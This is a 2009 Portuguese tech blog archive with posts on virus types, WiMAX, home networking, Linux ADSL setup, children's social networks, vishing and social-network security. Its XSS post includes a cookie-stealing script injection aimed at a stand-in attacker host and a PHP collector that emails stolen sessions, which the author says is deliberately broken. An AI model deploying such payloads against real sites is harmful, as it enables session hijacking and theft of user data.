25 dezembro, 2009

Tipos de Vírus

Vírus de disco

Os vírus de disco infectam o boot-sector. Esta é a parte do disco rígido respinsável pela manutenção dos ficheiros de arranque. Da mesma maneira que uma biblioteca precisa de um índice para saber onde se encontram os livros, um disco precisa de ter uma tabela com o endereço dos dados armazenados. Qualquer operação de leitura ou escrita de um ficheiro, precisa do uso dessa tabela. Gravar ou carregar o ficheiro numa disquete infectada possibilita a activação do vírus, que pode infectar outras disquetes e o disco rígido.

Vírus de ficheiro

Estes vírus infectam os ficheiros executáveis ou de extensão .SYS, .OVL, .MNU, etc. Estes vírus copiam-se para o início ou para o fim do ficheiro. Desta maneira, ao abrir o programa X, o vírus activa-se e executa ou não outras tarefas e só depois inicia o verdadeiro programa.

Vírus multi-partie

Infectam tanto a disquete como os ficheiros executáveis. São extremamente sofisticados.

Vírus Tipo DIR-II

Alteram a tabela de ficheiros de forma a serem chamados antes do ficheiro programa. Nem são propriamente FILE-INFECTORS nem são realmente BOOT-INFECTORS e muito menos multi-partites.

19 dezembro, 2009

WiMAX: Procurando a liberdade

O funcionamento do WiMAX para poder ser concretizado devem-se implantar estações de cobertura em locais específicos, para que uma determinada região tenha acesso ao serviço. As antenas devem estar direccionadas para as zonas onde se encontram os subscritores do serviço de modo a que o sinal emitido pelas estações chegue até ao utilizador final. Mas, tal como nas redes de telemóveis, não é necessário ter o campo de sinal directo (sem obstrução) entre a antena do receptor (utilizador) e o transmissor (equipamento) para as faixas com uma largura de banda inferior a 10GHz.

Como a estrutura das redes de telemóveis já está num patamar tecnologicamente evoluído, a tendência é que as novas empresas comecem a aplicar o WiMAX e aproveitem os espaços vagos nas torres de antenas de telemóveis e outros locais para instalar os seus equipamentos, evitando assim o aparecimento de novas torres, as quais são extremamente difíceis de viabilizar, devido às leis cada vez mais duras da colocação das antenas de transmissão nas localidades e à escassez de terrenos ou locais disponíveis.

O desenvolvimento da tecnologia, com as técnicas de modulação e eficiência dos rádios transmissores e receptores permite uma evolução da mobilidade do utilizador. Por isso, várias revisões da norma IEEE 802.16 têm sido efectuadas, onde a cada nova versão mais mobilidade é adicionada. A tabela seguinte mostra a sua evolução.

Acesso Dispositivos Velocidade Handoff
Fixo Modem indoor e outdoor Parado Não
Nómada Modem indoor e cartões PCMCIA Parado Não
Portátil cartões PCMCIA e chips em laptops Andando Hard handoff
Móvel (baixa velocidade) Cartões PCMCIA e chips em laptops veículo a baixa velocidade (menos que 40 Km/h) Hard handoff
Móvel (alta velocidade) Cartões PCMCIA, PDA, Smartphone Veículo a alta velocidade (acima de 40 Km/h) Soft handoff

 

Handoff é um termo técnico adoptado para indicar toda a troca de canal e estação, sem que o utilizador perceba, dando assim continuidade à comunicação.

Segundo a visão da Intel (uma das maiores fabricantes de chips para computadores do mundo, parceira dos fabricantes de equipamentos e que desenvolve chips para a tecnologia WiMAX), todos os equipamentos que têm a função de computação (portáteis, palms, PDA, etc.) tendem a ter integração com sistemas de comunicação de banda larga. E todos os equipamentos que têm função de comunicação (telemóveis, smartphones, rádios, etc.) tendem a ter aumento na sua capacidade de computação. Portanto, será impossível desvincular a computação da comunicação.

em desenvolvimento

14 dezembro, 2009

Cross-Site Scripting (XSS)

Cross-site scripting (XSS) é a melhor forma de ataque contra a rede interna de empresas. O XSS permanece como o ataque mais popular contra todos porque é fácil de encontrar e de executar, enquanto que as consequências deste ataque podem ser devastadoras. O XSS é normalmente mencionado durante a discussão de exploração de falhas de segurança no lado do cliente. Neste artigo vou assumir que estás familiarizado com o conceito do XSS. O objectivo desta entrada é demonstrar como os hackers sofisticados de hoje em dia conseguem ter a maior das vantagens com as falhas do XSS.

O monte de dados que está a ser repassado entre utilizadores e aplicações online é impressionante. Parece que qualquer função empresarial mais significante tem uma interface web para gestão e utilização dos dados. A enorme informação sensível que é transmitida em transacções online torna os roubos online apelativos e muito lucrativos. Dos vários ataques online, o XSS permanece como um dos mais proliferantes. Apesar do grande número de técnicas que existem para o ataque de XSS, apenas vou exemplificar alguns ataques que estão direccionados para o roubo de informações dos utilizadores. Estes ataques aumentam em complexidade e podem ser utilizados como ponto de partida para ataques mais evoluídos.

P.S.: Todos exemplos aqui mostrados possuem erros de programação colocados de propósito de forma a não serem utilizáveis. Pois eu não poderei saber se uso que lhes dessem seria de uma maneira positiva ou negativa.

 

Roubando Sessões

Muitas vezes os hackers utilizam o XSS para roubar as sessões dos utilizadores. De seguida vou demonstrar o “Ola Mundo” dos ataques XSS. O mais simples parece-se com isto:

http://servidorvulneravel.pt/falha.jsp?parameter=”><script> doc.loc=http://servidoratacante.pt/apanhacookies.php?cookie=+”doc.coo+”&loca=”+doc.loc;</script>

O cabeçalho inserido envia os cookies do utilizador para o servidor do atacante. No servidor do atacante, o ficheiro apanhacookies.php guardar os valores do cookie e notifica o atacante de uma invasão bem sucedida:

<?php
if(($_GET[‘cookie’] == “”)||($_GET[‘loc’] == “”))
{
// nenhuma acção necessária
}
else
{
// Cookies roubados e localização
$cookie=$_GET[‘cookie’];
$location=$_GET[‘location’];
//Notifica o atacante
$stolencookies = “ Abre o navegador: “ . $location . “;
\r\n Define o cookie: javascript:document.cookie=’”. $cookie . “’;
\r\n Rouba a sessão!: “ . $location;
$name = “Outra vitima”;
$email = “vitima@sessãoroubada.com";
$recipient = “atacante@ataque.com”;
$email_body = $stolencookies;
$subject=”Mais um caiu na falha – “ .$location;
$header= “De: “ .$Name

Sim é assim tão simples. Com o código PHP no servidor do atacante, roubar uma sessão é como tirar doces a uma criança.

11 dezembro, 2009

Escândalo Magalhães e a password de controlo parental

Este é um daqueles exemplos de uma notícia sensacionalista publicada nesta república das bananas. Qualquer pai mais atento já sabia qual é a password e todos sabemos que está disponível na Internet na página da SeguraNet.

Agora não venham as Associações de Pais queixarem-se devido a isto, após este tempo todo. Pois eles PAIS em agregados familiares onde o Magalhães e o único computador presente para utilização, pais esses que muitas vezes pedem aos técnicos de informática para removerem a dita password desactivando o controlo parental para terem acesso aos sites todos que desejam visitar e depois dizem que os filhos andam a ver pornografia…

Não é de admirar a culpa começa em casa… É o que acontece quando não se lê o manual de instruções, senão trazia manual é porque não trazia; agora se o trás ninguém lhe toca. Todos sabemos que o código PIN do multibanco é secreto, e alguns de nós têm a atenção de o mudarem, então porquê é que não mudam a password do Controlo Parental? Optam por permitir acesso indiscriminado e depois reclamam porque os filhos vêm o que não deviam ver. A culpa é de todos porque a nossa sociedade ainda não está consciente dos perigos presentes na Internet.

Sinceramente acho que é mesmo a lei do criticar tudo e todos e não fazer nada para mudar as coisas. Pois é mais fácil falar mal, do que tentar mudar algo.

Atentamente
Matafome

10 dezembro, 2009

Como colocar computadores antigos (386, 486) em rede?

O processo é o mesmo utilizado para ligar os computadores de última geração. Serão necessárias duas placas de rede compatíveis com o modelo dos computadores, os seus respectivos drivers e o cabo crossover para fazer a ligação.

A diferença está no sistema operativo instalado nestes computadores. Dependendo da configuração do computador, isso pode não funcionar em versões mais actuais do Windows. Tente experimentar com o Windows 95 ou distribuições do Linux. Basta ligar a placa ao computador, configurar o dispositivo com os drivers do fabricante e ligar aos outros computadores da rede.

É possível a criação de uma rede USB entre dois computadores?

Sim; mas apesar de a ideia parecer boa, este tipo de ligação não tem um desempenho comparado ao do padrão Ethernet. A montagem da rede é muito simples, você precisa de um cabo do tipo USB Data Link, dos drivers de instalação do cabo e da versão do Windows que deseja utilizar e de uma porta USB disponível em cada computador.

O cabo, também conhecido como A/B, é especialmente feito para estabelecer esta ligação. Ele possui duas pontas iguais com um adaptador no meio para lidar com os dados transmitidos entre os computadores.

O próximo passo é instalar os drivers do cabo nos computadores. Além disso, o Windows pedirá o disco em algumas situações. É de lembrar que este método só permite a transmissão dados, o que não vai permitir que tenha acesso a dispositivos como CD-ROM, impressoras e afins.

09 dezembro, 2009

Redes sociais para crianças

A Internet possui montes de redes sociais, mas normalmente o seu uso é para maiores de 13 anos. Estas redes excluem um público emergente as crianças.Existem motivos para se preocupar com os seus filhos estão prestes a entrar nestas redes direccionadas para os mais velhos. As informações que circulam por estes espaços não costumam ter algum tipo de filtro, para piorar isto tudo, a pedofilia é um problema cada vez mais evidente na Internet.

O que fazer então para estas crianças? Direccionado para este público tão específico foram criadas redes sociais com uma segurança melhorada.

Club Penguin

Uma rede social gratuita da Disney, Club Penguin é um mundo virtual criado em Flash onde os pinguins controlam. Divertida, esta rede social permite criar um avatar de um penguin que será utilizado para explorar tudo em volta.

Em cada cenário é possível ver representações visuais dos outros utilizadores ligados, como trocar mensagens e participar em jogos como dança e surf. Os jogos podem ser feitos individualmente ou em grupo, o que aumenta a interacção entre utilizadores.

As actividades rendem moedas, mas para utilizá-las é necessário ser assinante. As moedas permitirão comprar acessórios e itens.

Ao registar uma criança, um e-mail de autorização vai ser enviado para o responsável adulto para que a activação seja feita. Cabe também ao responsável estabelecer qual o tipo de mensagens que depois pode ser trocado pela criança.

A favor: ambiente rico e divertido, com muita coisa para explorar.
Contra: mesmo sendo muito visual, demora um bocado a descobrir as funções e os jogos.

Endereço: http://www.clubpenguin.com/pt/

 

Stardool

É um ambiente onde se pode vestir bonecas, a Stardoll tem uma temática direccionada para as meninas.

O seu público alvo situa-se entre a faixa dos 7 aos 17 anos, só que para menores de 13 anos o serviço utiliza um ambiente seguro, onde a criança não pode divulgar informações particulares ou não pode enviar mensagens ou comunicar nos foruns.

Todas as palavras passam por um filtro que bloqueia as palavras impróprias. Uma comunidade de moderadores, automáticos e humanos, examina cada recanto do serviço procurando infracções e os próprios membros são incentivados a denunciar abusos.

Ao se registar a criança precisa de inserir o e-mail de um responsável, que autorizará ou não a sua participação. Embora possua recursos interessantes de comunicação e interacção com outros jogadores, este só pode ser utilizado se os pais desactivarem a protecção para menores de 13 anos.

Do meu ponto de vista, é necessário uma mudança na educação das crianças. A segurança dos mais novos está assente nos pilares da educação, conversa e participação. É cada vez mais difícil controlar tudo o que as crianças fazem na Internet, o que devemos fazer é indicar-lhes os sitios que podem aceder, alertá-las para os perigos e ensiná-las a se protegerem.

Recomendo quando escolherem uma rede social para os vossos filhos, que tenha uma empresa a dar suporte, e que essa mesma rede possua filtro de conteúdos.

Endereço: http://www.stardoll.com/pt/

Possui dois computadores e quer interligá-los?

Existem duas formas de se colocar dois computadores em rede através de um cabo crossover ou instalando um roteador com ou sem fio. Pelo primeiro método, você deve ter placas de rede nos dois computadores com conectores RJ-45 e um cabo crossover compatível. Após ligá-los às placas, configure o sistema para que eles possam comunicar. Entre no Painel de Controlo, seleccione Opções de Rede ou Ligações de Rede, abra as propriedades da ligação e active a partilha de impressora e ficheiros. Se tiver de instalar algum protocolo, siga as instruções fornecidas pelo sistema.

O segundo método, com o routeador, é mais interessante se o local possui ligação à Internet, sendo que cada um deve receber o sinal de forma independente. Compre um routeador com ou sem fio, ligue-o apenas a um dos computadores e instale o software que acompanha o produto, seguindo todas as instruções. feito isto, basta apenas ligar o routeador ao outro computador e entrar na opção de Redes ou Ligações de Rede dos sistemas. Você deverá fornecer um nome de rede igual aos dois computadores. Ao concluir o processo, os computadores poderão partilhar ficheiros, impressoras, Internet e outros recursos.

Colocar a sua ligação ADSL a funcionar no Linux?

O primeiro passo para configurar a sua ligação ADSL no Linux é instalar o RP-PPPoE. Praticamente todas as distribuições actuais já o trazem incluído, mas é melhor utilizar a última versão. Para começar o processo de configuração depois de instalado o RP-PPPoE digite:

adsl-setup

Aparecerá uma mensagem de apresentação do sistema. Em seguida será pedido as informações da ligação:

Username

Aqui, você deve introduzir o seu nome de utilizador do PPPoE, em regra geral fo formato utilizador@isp.pt, como nomedaconta@sapo.pt

Após isto aparecerá:

Interface

Enter the Ethernet interface connected to the ADSL modem.
For Solaris, this is likely to be something like /dev/hme0.
For Linux, it will be ethn, where ‘n’ isa  number.
(default eth0):

Isto quer dizer que você deve digitar a interface Ethernet na qual o modem se encontra ligado. Se houver apenas uma placa de rede, provavelmente ela será /dev/eth0, a primeira interface padrão no sistema. De seguida, defina se o seu computador deve manter a ligação activa por tempo indefinido, ou seja colocá-lo no modo “on demand”, que desliga a ligação se não for utilizada a Internet por um certo período de tempo. A mensagem é a seguinte:

Do you want the link to come up on demand, or stay up continuosly? If you want it to come up on demand, enter the idle time in seconds after which the link should be dropped. If you want the link to stay up permanently, enter ‘no’ (two letters, lower-case).
NOTE: Demand-activated links do not interact well with dynamic IP addresses. You may have some problems with demand-activated links.
Enter the demand value (default no):

Aqui, digite ‘yes’ para ligação sob pedido ou ‘no’ para ligação permanente. Recomendo seleccionar a opção ‘no’ para deixar o seu computador ligado por tempo indeterminado.
O próximo passo é a configuração do DNS da máuina. Estes dados, devem ser fornecidos pelo seu ISP. Nalguns casos, o endereço pode não funcionar correctamente. Para resolver este problema digite ‘server’. Isto fará com que o sistema procure pelo DNS automaticamente.

Please enter the IP address of your ISP’s primary DNS server. If your ISP claims that ‘the server will provide DNS addresses’, enter ‘server’ (all lower-case) here. If you just press Enter, I will assume you know what you are doing and not modify your DNS setup.
Enter the DNS information here:

Após definir o DNS, digite a senha de acesso ao ISP de ADSL. Em seguida, confirme a senha:

Please enter your PPPoE password:

Após definir o DNS, é hora de definir as configurações de firewall do Linux. O sistema providenciará um grupo de regras básicas para esta tarefa. É aconselhável realizar um upgrade destas regras assim que o procedimento estiver completo. O sistema mostrará a seguinte mensagem:

Please choose the firewall rules to use. Note that these rules are very basic. You are strongly encouraged to use a more sophisticated firewall setup; however, these will provide basic security. If you are runing any servers on your machine, you must choose ‘NONE’ and set up firewalling yourself. Otherwise, the firewall rules will deny access to all standard servers like Web, Mail, FTP, etc. if you are using SSH, the rules will block outgoing SSH connections which allocate a privileged source port.
The firewall choices are:

0 – NONE: This script will not set any firewall rules. You are responsible for enuring security of your machine. You are STRONGLY recommended to use some kind of firewall rules.

1 – STANDARD: Appropriate for a basic stand alone web surfing workstation.

2 – MASQUERADE: Appropriate for a machine acting as an Internet Gateway for a LAN.

Choose a type of firewall (0-2):

O sistema fornecerá três opções para a configuração do seu firewall. Ao pressionar 0, você dirá ao sistema para não aplicar qualquer regra de protecção, o que é desaconselhável. A opção 1 o ajustará para uma estação de trabalho, ou seja, um único computador com privilégios de acesso à Internet. A opção 2 é indicada para um computador que funciona como ponto de distribuição da partilha da ligação à Internet para uma rede local.
O Linux perguntará se o utilizador deseja iniciar a ligação sempre que o computador for ligado:

Start this connection at boot time. Please enter no or yes:

Neste caso, “yes” guardará a onfiguração, enquanto “no” fará com que você tenha de digitar o comando adsl-start sempre que desejar ligar à Internet. No final do procedimento, o computador mostrará os seguintes dados sobre a sua ligação:

Ethernet Interface: eth0
User name: como nome@sapo.pt
Activate-on-demand: No
DNS: (DNS do ISP)
DNS2: (DNS do ISP)
Firewalling: STANDALONE
Accept these settings and adjust configuration files (y/n)?

Se estiver de acordo carregue em ‘y’. O sistemá fará a cópia de segurança dos ficheiros antigos e mostrará a seguinte mensagem:

Adjusting /etc/ppp/pppoe.conf
Adjusting /etc/ppp/pap-secrets and /etc/ppp/chap-secrets
(But first backing it up to /etc/ppp/pap-secrets-bak)
(But first backing it up to /etc/ppp/chap-secrets-bak)
Congratulations, it should be all set up!
Type ‘adsl-start’ to bring your ADSL link and ‘adsl-stop’ to bring it down. Type ‘adsl-status’ to see the link status.

O sistema está configurado. Digite adsl-start para iniciar a ligação, adsl-stop para interromper e adsl-status para ver as informações da rede.

06 dezembro, 2009

Vishing

Vishing é uma prática crime da utilização de engenharia social através do sistema telefónico, normalmente utilizando opções disponíveis em Voz sobre IP (VoIP), para ganhar acesso a dados privados e informação financeira do público alvo de forma a obter recompensa monetária. O termo é uma combinação de “voice” (voz) e “phishing” (pesca). O vishing explora os serviços das redes de telefone públicas, que tradicionalmente tem terminações locais que estão identificadas pela companhia dos telefones, e tem associado um cliente que paga pelo serviço. A vítima muitas vezes não está informada que o VoIP torna mais fácil a falsificação de identidade com o Spoof do ID, criando sistemas complexos automáticos (IVR), de baixo custo e o anonimato para o cliente amplamente disponível. O Vishing é normalmente utilizado para roubar números de cartões de crédito, ou noutros esquemas de roubo de identidade da vítima.

O Vishing é muito mais difícil de monitorizar e detectar. Para se protegerem, os consumidores são aconselhados para serem muito desconfiados relativamente quando recebem mensagens a dizerem para eles telefonarem para fornecer o número do cartão de crédito ou o número da conta bancária. Em vez de fornecer qualquer informação, recomendo os leitores a contactarem o seu banco ou instituição de crédito para verificarem a validade da mensagem.

Existe tecnologia que monitoriza todas as redes públicas comutadas de telefones (PSTN), baseado no comportamento do tráfego podem ser detectadas tentativas de vishing como um resultado de anomalias durante a chamada. Um exemplo é múltiplas chamadas de um número limitado de números do Skype para Call Centers.

Exemplo:

  1. O criminoso configura um dialer (programa de realização de chamadas) para números de telefone de uma determinada zona ou acede ao correio de mensagens de voz de uma companhia com a lista de números de telefone roubadas de uma instituição financeira.
  2. Quando a vítima atende a chamada, uma gravação automática, normalmente criada utilizando sintetizadores de texto para voz, é reproduzida para avisar o consumidor que o seu cartão de crédito foi alvo de actividade fraudulenta ou que a conta bancária teve uma actividade fora do normal. A mensagem depois indica que o consumidor deve telefonar para um número de telefone imediatamente. O mesmo número de telefone é normalmente mostrado na Identificação do número que está a ligar e mostra o mesmo nome que a instituição financeira possui.
  3. Quando a vítima telefona para o número, a chamada é atendida de forma automática dando instruções para se introduzir o número do cartão de crédito ou introduzir o número da conta bancária no teclado
  4. Quando a vítima introduz os seus dados do cartão de crédito, ou da sua conta bancária, o visher passa a possuir a informação necessária para fazer uma utilização fraudulenta do cartão ou para ter acesso à conta.
  5. A chamada normalmente pede mais dados adicionais tais como o PIN de segurança, data de validade, data de nasciment, etc.

É como se fosse uma variação do phishing realizado por e-mail.

Exemplo de notícias sobre vishing:

BBC News: http://news.bbc.co.uk/2/hi/technology/5187518.stm

The Register: http://www.theregister.co.uk/2008/01/21/fbi_vishing_warning/

Atentamente Matafome

Facebook Vs Hi5? Qual o mais seguro?

Olá a todos esta entrada no meu blog é dedicada a uma luta de titãs das redes sociais Facebook Versus Hi5. Vamos tentar descobrir qual o melhor….

Hi5 (2005-actualidade) – Falha de segurança que permite a utilização do exploits utilizando XSS.

Facebook (2008 aquando da actualização do novo design) – Os dados definidos como privados de utilizadores simplesmente deixaram de ser tão privados passaram a estar vísiveis para todos. Ou seja o design que implementaram ainda estava em fase Beta, por outras palavras, meteram uma versão não concluída em funcionamento dando origem a esta gravíssima falha. Março do mesmo ano uma falha de segurança permitiu o acesso às fotos privadas dos utilizadores.

Ataque de phisihing (2008) – Ambas as redes sociais foram atacadas pelo menos 50 sites aparentavam ser as páginas do hi5 e do facebook. Enviando e-mails com hiperligações para essas páginas ao observarem a página tal e qual o utilizador introduzi-a os dados pensando tratar-se da página real e infelizmente era uma cópia.

Para se protegerem deste último exemplo, digitem sempre o endereço na barra de endereço do vosso navegador de Internet, para terem a certeza que estão no endereço correcto.

Resultado: 50% Hi5 – 50% Facebook

As redes sociais não seguras, não devemos colocar lá dados pormenorizados sobre nós próprios, podemos usar alcunhas, localidades nunca metam a real, metam região assim estão mais protegidos a data de nascimento não metam nada disso. Aceitem apenas pedidos de amizade de pessoas que conhecem. De preferência antes de aceitarem troquem mensagens com a pessoa para terem a certeza que é ela. E tomem atenção pois este tipo de redes são as preferidas pelos Predadores Sexuais, por isso tenham cuidado com quem se relacionam… Não interessa se têm 5 amigos ou 50 mil amigos, interessa é que os conheçam de certeza.

Atentamente Matafome